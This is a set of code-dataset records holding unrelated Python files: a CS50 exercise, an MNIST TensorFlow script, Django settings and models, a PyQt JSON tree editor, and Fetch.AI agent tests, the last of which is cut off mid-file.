+{"seq_id":"609086947","text":"import cs50\n\ndef main():\n    height = get_positive_int()\n    print(\"\")\n    for i in range(height):\n        for j in range (height-1-i):\n            print(\" \", end=\"\")\n        for j in range (i+2):\n            print(\"#\", end=\"\")\n        print(\" \", end=\"\")\n        for j in range (i+2):\n            print(\"#\", end=\"\")\n        print(\"\")\n    print(\"\")\n    \ndef get_positive_int():\n    while True:\n        print(\"Give me a positive int (1-23): \", end=\"\")\n        height = cs50.get_int()\n        if height >= 1 and height <= 23:\n            break\n    return height\n    \nif __name__ == \"__main__\":\n    main()","sub_path":"mario/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"497827838","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n# training data: 60000*784\n# training labels: 60000*10\n\n# input layer: 784 neurons\n# output layer: 10 neurons\n# no hidden layer\n\n# for each single sample, the input is 1*784\n# for each single sample, the weight matrix is 784*10\n# for each single sample, the output is 1*10, e.g. the digit 2 -> 0010000000\n\n# 1. load the dataset\n'''one_hot turns each label into a vector of 0s and 1s: exactly one position is 1 and all the others are 0'''\n# it is best to write the path as a raw string (r prefix) so backslashes stay literal\nmnist = input_data.read_data_sets(r\"E:\\project1\\MNIST_data\\MNIST_data\",one_hot=True)\n\n'''size of one batch (the network is fed batch by batch); here one batch is 100 images'''\nbatch_size = 100\n\n# the total number of batches is n_batch\n'''// is integer division and returns the largest integer not greater than the result'''\nn_batch = mnist.train.num_examples // batch_size\n\n# define two placeholders\nx = tf.placeholder(tf.float32,[None,784]) # samples\ny = tf.placeholder(tf.float32,[None,10]) # sample labels\n\n# build a simple neural network\nW = tf.Variable(tf.zeros([784,10])) # weights applied to each sample; every sample has 784 pixels\nb = tf.Variable(tf.zeros([1,10])) # one bias per output neuron (10 of them), stored as a single row\n# keep the raw scores (logits) separate: the fused loss op below expects\n# pre-softmax logits, and feeding softmaxed values would apply softmax twice\nlogits = tf.matmul(x,W)+b\nprediction = tf.nn.softmax(logits)\n\n# quadratic cost function\n# loss = tf.reduce_mean(tf.square(y-prediction))\n# softmax cross-entropy cost function\n# this op pairs softmax with the cross-entropy cost; labels takes the true labels and logits takes the raw predicted scores\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=logits))\n\n# gradient descent\ntrain_step = tf.train.GradientDescentOptimizer(0.2).minimize(loss)\n\n# initialize the variables\ninit = tf.global_variables_initializer()\n\n# the per-sample results are stored in a list of booleans\n'''\ntf.argmax(input, dimension, name=None) returns the index of the largest value; dimension=0 searches down columns, dimension=1 along rows.\nFor a vector it returns a single index;\nfor a matrix it returns a vector whose entries are the argmax indices of the corresponding rows.\nIt is usually paired with tf.equal() to compute model accuracy\n'''\ncorrect_prediction = tf.equal(tf.argmax(y,1),tf.argmax(prediction,1))\n# compute the accuracy\n'''correct_prediction is boolean; tf.cast converts it to float32'''\naccuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\n\nwith tf.Session() as sess:\n    sess.run(init)\n    for epoch in range(21):\n        for batch in range(n_batch):\n            batch_xs,batch_ys = mnist.train.next_batch(batch_size)\n            
sess.run(train_step,feed_dict={x:batch_xs,y:batch_ys})\n \n acc = sess.run(accuracy,feed_dict={x:mnist.test.images,y:mnist.test.labels})\n print(\"Iter \" + str(epoch) + \",Testing Accuracy \" + str(acc))\n\n\n\n\n\n\n","sub_path":"3.2MNIST数据集分类简单版本.py","file_name":"3.2MNIST数据集分类简单版本.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"243572317","text":"from re import compile as regex\nfrom knock50 import sentences\n\nexpand = regex(r'([.,:?!]|[A-Z]\\w+|(\\w\\.){2,})')\ninvisible = regex(r'[\\s\\b]+')\n\ndef split(line):\n line = expand.sub(r' \\1 ', line) # or src_obj.index\n return tuple(i for i in invisible.split(line) if len(i))\n\nif __name__ == '__main__':\n for sent in sentences():\n for tok in split(sent):\n print(tok)\n","sub_path":"zchen/chapter06/knock51.py","file_name":"knock51.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"479966171","text":"\"\"\"\nDjango settings for grubbing project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\nfrom grub_environment import GrubEnv\n\nge = GrubEnv()\n\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = ge.env('SECRET_KEY')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = ge.env('DEBUG', False)\n\nTEMPLATE_DEBUG = ge.env('TEMPLATE_DEBUG', False)\n\nALLOWED_HOSTS = [ge.env('ALLOWED_HOSTS', '*')]\n\n# Application definition\n\nLOCAL_APPS = (\n 'grub',\n 'auth',\n)\n\nTHIRD_PARTY_APPS = (\n 'rest_framework',\n 'south',\n 'gunicorn',\n)\n\nDEFAULT_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.gis',\n)\n\nINSTALLED_APPS = DEFAULT_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'grubbing.urls'\n\nWSGI_APPLICATION = 'grubbing.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': ge.env('DB_ENGINE'),\n 'NAME': ge.env('DB_NAME'),\n 'USER': ge.env('DB_USER'),\n 'PASSWORD': ge.env('DB_PASS'),\n 'HOST': ge.env('DB_HOST')\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'es-VE'\n\nTIME_ZONE = 'America/Caracas'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nPOSTGIS_TEMPLATE = ge.env('POSTGIS_TEMPLATE', 'template_postgis')\nPOSTGIS_VERSION = (1, 5, 3)\n\nREST_FRAMEWORK = {\n 'PAGINATE_BY:': 10\n}\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': 
'debug.log',\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['file'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n },\n}\n","sub_path":"grubbing/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"237645435","text":"import json\r\nimport sys\r\nfrom mainwindow import Ui_MainWindow\r\nfrom settings import Ui_Dialog\r\nfrom treeview import Model, Delegate, Item\r\nfrom PyQt5 import QtWidgets, QtCore\r\n\r\nclass Settings(QtWidgets.QDialog):\r\n def __init__(self, parent, columns):\r\n super().__init__(parent)\r\n \r\n self.ui = Ui_Dialog()\r\n self.ui.setupUi(self)\r\n self.model = Model(self)\r\n self.model.insertColumns(0, ['column'])\r\n self.ui.listView.setModel(self.model)\r\n self.ui.listView.setItemDelegate(Delegate())\r\n self.ui.listView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\r\n self.ui.listView.customContextMenuRequested.connect(self.contextMenu)\r\n\r\n for column in columns:\r\n self.model.insertRows(self.model.root_item.childCount(), 1)\r\n child_item = self.model.root_item.child(-1)\r\n child_item.set_data('column', column)\r\n\r\n def add_item(self):\r\n self.model.insertRows(self.model.root_item.childCount(), 1)\r\n\r\n def columns(self):\r\n result = self.exec()\r\n data = self.model.data\r\n index = self.model.index\r\n columns = [ data(index(r, 0, QtCore.QModelIndex())) for r in range(self.model.rowCount()) ]\r\n return (columns, result == QtWidgets.QDialog.Accepted)\r\n \r\n def contextMenu(self, point):\r\n self.menu = QtWidgets.QMenu(self)\r\n self.menu.addAction('Add', self.add_item)\r\n self.menu.addAction('Delete', self.delete_item)\r\n self.menu.exec_( self.focusWidget().mapToGlobal(point) )\r\n \r\n def delete_item(self):\r\n indexes = self.ui.listView.selectedIndexes()\r\n for index in indexes:\r\n self.model.removeItem(index)\r\n\r\nclass MainWindow(QtWidgets.QMainWindow):\r\n def __init__(self, app):\r\n super().__init__()\r\n \r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self)\r\n\r\n self.model = Model(self)\r\n\r\n self.ui.treeView.setModel(self.model)\r\n self.ui.treeView.setItemDelegate(Delegate())\r\n self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\r\n self.ui.treeView.customContextMenuRequested.connect(self.contextMenu)\r\n\r\n self.ui.actionAddChild.triggered.connect(self.add_child)\r\n self.ui.actionDelete.triggered.connect(self.delete_item)\r\n self.ui.actionOpen.triggered.connect(self.open_json)\r\n self.ui.actionSave.triggered.connect(self.save_json)\r\n self.ui.actionSettings.triggered.connect(self.show_settings_dialog)\r\n\r\n def show_settings_dialog(self):\r\n columns, result = Settings(self, self.model.columns()).columns()\r\n if not result:\r\n return\r\n self.model.removeColumns(0, self.model.columnCount())\r\n self.model.insertColumns(0, columns)\r\n\r\n def open_json(self, filename):\r\n\r\n def recursion(_part, _parent_index, _parts):\r\n _dict = { key:_part[key] for key in _part if not 'parts' == key }\r\n parent_item = _parent_index.internalPointer()\r\n if parent_item is None:\r\n parent_item = self.model.root_item\r\n self.model.insertRows(parent_item.childCount(), 1, _parent_index)\r\n child_item = parent_item.child(-1)\r\n child_item.set_dict(_dict)\r\n if 'parts' in _part:\r\n index = self.model.createIndex(parent_item.childCount(), 0, child_item)\r\n children = _part['parts']\r\n for child in children:\r\n recursion(child, index, parts)\r\n \r\n 
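# a sketch of the JSON layout this loader expects (inferred from the\r\n        # code, not from a written spec): a top-level object carrying\r\n        # \"columns\" plus a nested list of \"parts\", for example:\r\n        #\r\n        #   {\"columns\": [\"name\", \"qty\"],\r\n        #    \"parts\": [{\"name\": \"root\", \"qty\": 1,\r\n        #               \"parts\": [{\"name\": \"leaf\", \"qty\": 4}]}]}\r\n        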
filename = QtWidgets.QFileDialog.getOpenFileName(self, 'Save file', '', 'JSON File (*.json)')\r\n if not filename[0]:\r\n return\r\n \r\n json_data = json.load( open(filename[0]) )\r\n self.model.removeColumns(0, self.model.columnCount())\r\n self.model.removeRows(0, self.model.root_item.childCount())\r\n self.model.insertColumns(0, json_data['columns'])\r\n\r\n parts = json_data['parts']\r\n for part in parts:\r\n recursion(part, QtCore.QModelIndex(), parts)\r\n \r\n def save_json(self):\r\n\r\n def recursion(parent):\r\n _dict1 = parent.dict\r\n if parent.childCount()==0:\r\n _dict1['parts'] = [ recursion(child) for child in parent.children() ]\r\n return _dict1\r\n \r\n parts = []\r\n for child in self.model.root_item.children():\r\n parts.append( recursion(child) )\r\n \r\n parts = {'columns':self.model.columns, 'parts':parts}\r\n\r\n filename = QtWidgets.QFileDialog.getSaveFileName(self, 'Save file', '', 'JSON File (*.json)')\r\n if filename[0]:\r\n json.dump(parts, open(filename[0],'w'), indent=4)\r\n\r\n def contextMenu(self, point):\r\n self.menu = QtWidgets.QMenu(self)\r\n self.menu.addAction('Add child', self.add_child)\r\n self.menu.addAction('Delete', self.delete_item)\r\n self.menu.exec_( self.focusWidget().mapToGlobal(point) )\r\n \r\n def add_child(self):\r\n indexes = self.ui.treeView.selectedIndexes()\r\n \r\n if len(indexes) == 0:\r\n self.model.insertRows(self.model.root_item.childCount(), 1, QtCore.QModelIndex())\r\n return\r\n \r\n indexes2 = []\r\n for index in indexes:\r\n if not index.row() in [ i.row() for i in indexes2 if i.parent() == index.parent() ]:\r\n indexes2.append(index)\r\n \r\n for index in indexes2:\r\n item = index.internalPointer()\r\n self.model.insertRows(item.childCount() + 1, 1, index)\r\n\r\n def delete_item(self):\r\n indexes = self.ui.treeView.selectedIndexes()\r\n\r\n if len(indexes) == 0:\r\n return\r\n\r\n indexes2 = []\r\n for index in indexes:\r\n if not index.row() in [ i.row() for i in indexes2 if i.parent() == index.parent() ]:\r\n indexes2.append(index)\r\n \r\n for index in indexes2:\r\n self.model.removeRows(index.row(), 1, index.parent())\r\n\r\ndef main():\r\n app = QtWidgets.QApplication(sys.argv)\r\n window = MainWindow(app)\r\n window.show()\r\n app.exec_()\r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"380382263","text":"from django.db import models\n\n\nclass Section(models.Model):\n name = models.CharField(max_length=128, verbose_name='Наименование раздела')\n slug = models.SlugField(max_length=128, unique=True)\n\n class Meta:\n verbose_name = 'Раздел'\n verbose_name_plural = 'Разделы'\n\n def __str__(self):\n return self.name\n\n\nclass Category(models.Model):\n name = models.CharField(max_length=128, verbose_name='Наименование категории')\n section = models.ForeignKey(\n Section,\n related_name='categories', on_delete=models.PROTECT, verbose_name='Раздел'\n )\n slug = models.SlugField(max_length=128, unique=True)\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n def __str__(self):\n return self.name\n\n\nclass Product(models.Model):\n name = models.CharField(max_length=128, verbose_name='Наименование')\n category = models.ForeignKey(\n Category,\n related_name='products', on_delete=models.PROTECT, verbose_name='Категория'\n )\n slug = models.SlugField(max_length=128, unique=True)\n image = 
models.ImageField(upload_to='img/products/', blank=True, verbose_name='Изображение')\n description = models.CharField(max_length=256, verbose_name='Описание')\n\n class Meta:\n verbose_name = 'Товар'\n verbose_name_plural = 'Товары'\n\n def __str__(self):\n return self.name\n\n\nclass Review(models.Model):\n product = models.ForeignKey(\n Product,\n related_name='reviews', on_delete=models.PROTECT, verbose_name='Товар'\n )\n name = models.CharField(max_length=128, verbose_name='Имя')\n content = models.TextField(verbose_name='Отзыв', default=False)\n rating = models.PositiveSmallIntegerField(verbose_name='Рейтинг')\n created = models.DateTimeField(auto_now_add=True, verbose_name='Дата и время создания')\n\n class Meta:\n verbose_name = 'Отзыв'\n verbose_name_plural = 'Отзывы'\n\n def __str__(self):\n return f'{self.name} {self.content[:30]}'\n","sub_path":"Diplom_django/products/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"172635861","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\"\"\"This module contains the tests for aea/aea.py.\"\"\"\n\nimport os\nimport tempfile\nimport time\nfrom pathlib import Path\nfrom threading import Thread\n\nimport pytest\n\nimport yaml\n\nfrom aea import AEA_DIR\nfrom aea.aea import AEA\nfrom aea.configurations.base import ProtocolConfig, PublicId\nfrom aea.connections.stub.connection import StubConnection\nfrom aea.crypto.fetchai import FETCHAI\nfrom aea.crypto.ledger_apis import LedgerApis\nfrom aea.crypto.wallet import Wallet\nfrom aea.identity.base import Identity\nfrom aea.mail.base import Envelope\nfrom aea.protocols.base import Protocol\nfrom aea.protocols.default.message import DefaultMessage\nfrom aea.protocols.default.serialization import DefaultSerializer\nfrom aea.registries.base import Resources\nfrom aea.skills.base import Skill\n\nfrom packages.fetchai.connections.local.connection import LocalNode, OEFLocalConnection\nfrom packages.fetchai.protocols.fipa.message import FIPAMessage\nfrom packages.fetchai.protocols.fipa.serialization import FIPASerializer\n\nfrom .conftest import (\n CUR_PATH,\n DUMMY_SKILL_PUBLIC_ID,\n LOCAL_CONNECTION_PUBLIC_ID,\n UNKNOWN_PROTOCOL_PUBLIC_ID,\n)\nfrom .data.dummy_aea.skills.dummy.tasks import DummyTask # type: ignore\nfrom .data.dummy_skill.behaviours import DummyBehaviour # type: ignore\n\n\ndef test_initialise_aea():\n \"\"\"Tests the initialisation of the AEA.\"\"\"\n node = LocalNode()\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n identity = Identity(\"my_name\", address=wallet.addresses[FETCHAI])\n connections1 = [\n OEFLocalConnection(\n 
identity.address, node, connection_id=OEFLocalConnection.connection_id\n )\n ]\n ledger_apis = LedgerApis({}, FETCHAI)\n my_AEA = AEA(\n identity,\n connections1,\n wallet,\n ledger_apis,\n resources=Resources(str(Path(CUR_PATH, \"aea\"))),\n )\n assert my_AEA.context == my_AEA._context, \"Cannot access the Agent's Context\"\n assert (\n not my_AEA.context.connection_status.is_connected\n ), \"AEA should not be connected.\"\n my_AEA.setup()\n assert my_AEA.resources is not None, \"Resources must not be None after setup\"\n my_AEA.resources = Resources(str(Path(CUR_PATH, \"aea\")))\n assert my_AEA.resources is not None, \"Resources must not be None after set\"\n assert (\n my_AEA.context.shared_state is not None\n ), \"Shared state must not be None after set\"\n assert my_AEA.context.task_manager is not None\n assert my_AEA.context.identity is not None, \"Identity must not be None after set.\"\n my_AEA.stop()\n\n\ndef test_act():\n \"\"\"Tests the act function of the AEA.\"\"\"\n with LocalNode() as node:\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n ledger_apis = LedgerApis({}, FETCHAI)\n connections = [\n OEFLocalConnection(\n identity.address, node, connection_id=LOCAL_CONNECTION_PUBLIC_ID\n )\n ]\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n\n agent = AEA(\n identity, connections, wallet, ledger_apis, resources, is_programmatic=False\n )\n t = Thread(target=agent.start)\n try:\n t.start()\n time.sleep(1.0)\n\n behaviour = agent.resources.behaviour_registry.fetch(\n (DUMMY_SKILL_PUBLIC_ID, \"dummy\")\n )\n assert behaviour.nb_act_called > 0, \"Act() wasn't called\"\n finally:\n agent.stop()\n t.join()\n\n\ndef test_react():\n \"\"\"Tests income messages.\"\"\"\n with LocalNode() as node:\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n ledger_apis = LedgerApis({}, FETCHAI)\n connection = OEFLocalConnection(\n identity.address, node, connection_id=LOCAL_CONNECTION_PUBLIC_ID\n )\n connections = [connection]\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n\n msg = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n msg.counterparty = identity.address\n message_bytes = DefaultSerializer().encode(msg)\n\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=DefaultMessage.protocol_id,\n message=message_bytes,\n )\n\n agent = AEA(\n identity, connections, wallet, ledger_apis, resources, is_programmatic=False\n )\n t = Thread(target=agent.start)\n try:\n t.start()\n time.sleep(1.0)\n agent.outbox.put(envelope)\n time.sleep(2.0)\n default_protocol_public_id = DefaultMessage.protocol_id\n dummy_skill_public_id = DUMMY_SKILL_PUBLIC_ID\n handler = agent.resources.handler_registry.fetch_by_protocol_and_skill(\n default_protocol_public_id, dummy_skill_public_id\n )\n assert handler is not None, \"Handler is not set.\"\n assert (\n msg in handler.handled_messages\n ), \"The message is not inside the handled_messages.\"\n except Exception:\n raise\n finally:\n agent.stop()\n t.join()\n\n\n@pytest.mark.asyncio\nasync def test_handle():\n \"\"\"Tests handle method of an 
agent.\"\"\"\n with LocalNode() as node:\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n ledger_apis = LedgerApis({}, FETCHAI)\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n connection = OEFLocalConnection(\n identity.address, node, connection_id=DUMMY_SKILL_PUBLIC_ID\n )\n connections = [connection]\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n\n msg = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n msg.counterparty = agent_name\n message_bytes = DefaultSerializer().encode(msg)\n\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=UNKNOWN_PROTOCOL_PUBLIC_ID,\n message=message_bytes,\n )\n\n agent = AEA(\n identity, connections, wallet, ledger_apis, resources, is_programmatic=False\n )\n t = Thread(target=agent.start)\n try:\n t.start()\n time.sleep(2.0)\n dummy_skill = agent.resources.get_skill(DUMMY_SKILL_PUBLIC_ID)\n dummy_handler = dummy_skill.handlers[\"dummy\"]\n\n expected_envelope = envelope\n agent.outbox.put(expected_envelope)\n time.sleep(2.0)\n assert len(dummy_handler.handled_messages) == 1\n\n # DECODING ERROR\n msg = \"hello\".encode(\"utf-8\")\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=DefaultMessage.protocol_id,\n message=msg,\n )\n expected_envelope = envelope\n agent.outbox.put(expected_envelope)\n time.sleep(2.0)\n assert len(dummy_handler.handled_messages) == 2\n\n # UNSUPPORTED SKILL\n msg = FIPASerializer().encode(\n FIPAMessage(\n performative=FIPAMessage.Performative.ACCEPT,\n message_id=0,\n dialogue_reference=(str(0), \"\"),\n target=1,\n )\n )\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=FIPAMessage.protocol_id,\n message=msg,\n )\n expected_envelope = envelope\n agent.outbox.put(expected_envelope)\n time.sleep(2.0)\n assert len(dummy_handler.handled_messages) == 3\n\n finally:\n agent.stop()\n t.join()\n\n\nclass TestInitializeAEAProgrammaticallyFromResourcesDir:\n \"\"\"Test that we can initialize the agent by providing the resource object loaded from dir.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n cls.node = LocalNode()\n cls.node.start()\n cls.agent_name = \"MyAgent\"\n cls.private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n cls.wallet = Wallet({FETCHAI: cls.private_key_path})\n cls.ledger_apis = LedgerApis({}, FETCHAI)\n cls.identity = Identity(cls.agent_name, address=cls.wallet.addresses[FETCHAI])\n cls.connection = OEFLocalConnection(\n cls.agent_name, cls.node, connection_id=LOCAL_CONNECTION_PUBLIC_ID,\n )\n cls.connections = [cls.connection]\n\n cls.resources = Resources(os.path.join(CUR_PATH, \"data\", \"dummy_aea\"))\n cls.aea = AEA(\n cls.identity,\n cls.connections,\n cls.wallet,\n cls.ledger_apis,\n cls.resources,\n is_programmatic=False,\n )\n\n cls.expected_message = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n cls.expected_message.counterparty = cls.agent_name\n envelope = Envelope(\n to=cls.agent_name,\n sender=cls.agent_name,\n protocol_id=DefaultMessage.protocol_id,\n message=DefaultSerializer().encode(cls.expected_message),\n )\n\n cls.t = Thread(target=cls.aea.start)\n cls.t.start()\n\n 
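# the pattern used throughout these tests (a reading of the code, not a\n        # documented AEA contract): run the agent loop in its own thread, give\n        # it a short grace period to start, push an Envelope addressed to the\n        # agent itself through the outbox, wait for the local node to loop it\n        # back, then assert on what the dummy skill recorded\n        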
time.sleep(0.5)\n cls.aea.outbox.put(envelope)\n time.sleep(0.5)\n\n def test_initialize_aea_programmatically(self):\n \"\"\"Test that we can initialize an AEA programmatically.\"\"\"\n dummy_skill_id = DUMMY_SKILL_PUBLIC_ID\n dummy_behaviour_name = \"dummy\"\n dummy_behaviour = self.aea.resources.behaviour_registry.fetch(\n (dummy_skill_id, dummy_behaviour_name)\n )\n assert dummy_behaviour is not None\n assert dummy_behaviour.nb_act_called > 0\n\n # TODO the previous code caused an error:\n # _pickle.PicklingError: Can't pickle : import of module 'tasks' failed\n dummy_task = DummyTask()\n task_id = self.aea.task_manager.enqueue_task(dummy_task)\n async_result = self.aea.task_manager.get_task_result(task_id)\n expected_dummy_task = async_result.get(2.0)\n assert expected_dummy_task.nb_execute_called > 0\n\n dummy_handler = self.aea.resources.handler_registry.fetch_by_protocol_and_skill(\n DefaultMessage.protocol_id, dummy_skill_id\n )\n dummy_handler_alt = self.aea.resources.handler_registry.fetch(\n (dummy_skill_id, \"dummy\")\n )\n assert dummy_handler == dummy_handler_alt\n assert dummy_handler is not None\n assert len(dummy_handler.handled_messages) == 1\n assert dummy_handler.handled_messages[0] == self.expected_message\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Tear the test down.\"\"\"\n cls.aea.stop()\n cls.t.join()\n cls.node.stop()\n\n\nclass TestInitializeAEAProgrammaticallyBuildResources:\n \"\"\"Test that we can initialize the agent by building the resource object.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n cls.node = LocalNode()\n cls.node.start()\n cls.agent_name = \"MyAgent\"\n cls.private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n cls.wallet = Wallet({FETCHAI: cls.private_key_path})\n cls.ledger_apis = LedgerApis({}, FETCHAI)\n cls.identity = Identity(cls.agent_name, address=cls.wallet.addresses[FETCHAI])\n cls.connection = OEFLocalConnection(\n cls.agent_name, cls.node, connection_id=LOCAL_CONNECTION_PUBLIC_ID\n )\n cls.connections = [cls.connection]\n\n cls.temp = tempfile.mkdtemp(prefix=\"test_aea_resources\")\n cls.resources = Resources(cls.temp)\n cls.aea = AEA(\n cls.identity,\n cls.connections,\n cls.wallet,\n cls.ledger_apis,\n resources=cls.resources,\n )\n\n default_protocol_id = DefaultMessage.protocol_id\n\n cls.default_protocol_configuration = ProtocolConfig.from_json(\n yaml.safe_load(open(Path(AEA_DIR, \"protocols\", \"default\", \"protocol.yaml\")))\n )\n cls.default_protocol = Protocol(\n default_protocol_id, DefaultSerializer(), cls.default_protocol_configuration\n )\n cls.resources.protocol_registry.register(\n default_protocol_id, cls.default_protocol\n )\n\n cls.error_skill = Skill.from_dir(\n Path(AEA_DIR, \"skills\", \"error\"), cls.aea.context\n )\n cls.dummy_skill = Skill.from_dir(\n Path(CUR_PATH, \"data\", \"dummy_skill\"), cls.aea.context\n )\n cls.resources.add_skill(cls.dummy_skill)\n cls.resources.add_skill(cls.error_skill)\n\n cls.expected_message = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n cls.expected_message.counterparty = cls.agent_name\n\n cls.t = Thread(target=cls.aea.start)\n cls.t.start()\n time.sleep(0.5)\n\n cls.aea.outbox.put(\n Envelope(\n to=cls.agent_name,\n sender=cls.agent_name,\n protocol_id=default_protocol_id,\n message=DefaultSerializer().encode(cls.expected_message),\n )\n )\n\n def test_initialize_aea_programmatically(self):\n 
\"\"\"Test that we can initialize an AEA programmatically.\"\"\"\n time.sleep(0.5)\n\n dummy_skill_id = DUMMY_SKILL_PUBLIC_ID\n dummy_behaviour_name = \"dummy\"\n dummy_behaviour = self.aea.resources.behaviour_registry.fetch(\n (dummy_skill_id, dummy_behaviour_name)\n )\n assert dummy_behaviour is not None\n assert dummy_behaviour.nb_act_called > 0\n\n dummy_task = DummyTask()\n task_id = self.aea.task_manager.enqueue_task(dummy_task)\n async_result = self.aea.task_manager.get_task_result(task_id)\n expected_dummy_task = async_result.get(2.0)\n assert expected_dummy_task.nb_execute_called > 0\n\n dummy_handler_name = \"dummy\"\n dummy_handler = self.aea.resources.handler_registry.fetch(\n (dummy_skill_id, dummy_handler_name)\n )\n dummy_handler_alt = self.aea.resources.handler_registry.fetch_by_protocol_and_skill(\n DefaultMessage.protocol_id, dummy_skill_id\n )\n assert dummy_handler == dummy_handler_alt\n assert dummy_handler is not None\n assert len(dummy_handler.handled_messages) == 1\n assert dummy_handler.handled_messages[0] == self.expected_message\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Tear the test down.\"\"\"\n cls.aea.stop()\n cls.t.join()\n cls.node.stop()\n Path(cls.temp).rmdir()\n\n\nclass TestAddBehaviourDynamically:\n \"\"\"Test that we can add a behaviour dynamically.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", 